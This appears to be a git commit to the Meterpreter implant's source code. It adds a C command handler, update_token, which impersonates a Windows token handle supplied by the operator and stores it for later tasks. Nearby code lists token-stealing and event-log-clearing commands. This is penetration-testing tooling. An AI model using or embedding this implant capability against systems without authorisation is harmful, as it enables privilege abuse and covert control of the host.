Land #648, Add update_token function to stdapi

2025-01-14 17:37:27 +01:00 · 2023-06-02 08:57:56 -04:00 · 2023-06-02 08:57:56 -04:00 · 5d6a9ea802
commit 5d6a9ea802
parent 90910dbce2 bdd2885571
4 changed files with 36 additions and 0 deletions
--- a/c/meterpreter/source/common/common_command_ids.h
+++ b/c/meterpreter/source/common/common_command_ids.h
@ -115,6 +115,7 @@
 #define COMMAND_ID_STDAPI_SYS_CONFIG_REV2SELF 1057
 #define COMMAND_ID_STDAPI_SYS_CONFIG_STEAL_TOKEN 1058
 #define COMMAND_ID_STDAPI_SYS_CONFIG_SYSINFO 1059
+#define COMMAND_ID_STDAPI_SYS_CONFIG_UPDATE_TOKEN 1120
 #define COMMAND_ID_STDAPI_SYS_EVENTLOG_CLEAR 1060
 #define COMMAND_ID_STDAPI_SYS_EVENTLOG_CLOSE 1061
 #define COMMAND_ID_STDAPI_SYS_EVENTLOG_NUMRECORDS 1062
--- a/c/meterpreter/source/extensions/stdapi/server/stdapi.c
+++ b/c/meterpreter/source/extensions/stdapi/server/stdapi.c
@ -112,6 +112,7 @@ Command customCommands[] =
 	COMMAND_REQ(COMMAND_ID_STDAPI_SYS_CONFIG_STEAL_TOKEN, request_sys_config_steal_token),
 	COMMAND_REQ(COMMAND_ID_STDAPI_SYS_CONFIG_DROP_TOKEN, request_sys_config_drop_token),
 	COMMAND_REQ(COMMAND_ID_STDAPI_SYS_CONFIG_GETSID, request_sys_config_getsid),
+	COMMAND_REQ(COMMAND_ID_STDAPI_SYS_CONFIG_UPDATE_TOKEN, request_sys_config_update_token),

 	// Net
 	COMMAND_REQ(COMMAND_ID_STDAPI_NET_CONFIG_GET_ROUTES, request_net_config_get_routes),
--- a/c/meterpreter/source/extensions/stdapi/server/sys/config/config.c
+++ b/c/meterpreter/source/extensions/stdapi/server/sys/config/config.c
@ -274,6 +274,39 @@ DWORD request_sys_config_drop_token(Remote* pRemote, Packet* pPacket)
 	return dwResult;
 }

+/*
+ * @brief Updates an existing thread token.
+ * @param pRemote Pointer to the \c Remote instance.
+ * @param pRequest Pointer to the \c Request packet.
+ * @returns Indication of success or failure.
+ */
+DWORD request_sys_config_update_token(Remote* pRemote, Packet* pPacket)
+{
+	Packet* pResponse = met_api->packet.create_response(pPacket);
+	DWORD dwResult = ERROR_SUCCESS;
+	HANDLE hToken = NULL;
+
+	// Get token handle from the client
+	hToken = (HANDLE)met_api->packet.get_tlv_value_qword(pPacket, TLV_TYPE_HANDLE);
+
+	// Impersonate token in the current thread
+	if (!ImpersonateLoggedOnUser(hToken))
+	{
+		dwResult = GetLastError();
+		dprintf("[UPDATE-TOKEN] Failed to impersonate token (%u)", dwResult);
+		met_api->packet.transmit_response(dwResult, pRemote, pResponse);
+		return dwResult;
+	}
+
+	// Store the token handle for future tasks
+	met_api->thread.update_token(pRemote, hToken);
+
+	// Empty response means success
+	met_api->packet.transmit_response(dwResult, pRemote, pResponse);
+
+	return dwResult;
+}
+
 /*
 * sys_getprivs
 * ----------
--- a/c/meterpreter/source/extensions/stdapi/server/sys/config/config.h
+++ b/c/meterpreter/source/extensions/stdapi/server/sys/config/config.h
@ -11,5 +11,6 @@ DWORD request_sys_config_getprivs(Remote *remote, Packet *packet);
 DWORD request_sys_config_steal_token(Remote *remote, Packet *packet);
 DWORD request_sys_config_drop_token(Remote *remote, Packet *packet);
 DWORD request_sys_config_driver_list(Remote *remote, Packet *packet);
+DWORD request_sys_config_update_token(Remote* pRemote, Packet* pPacket);

 #endif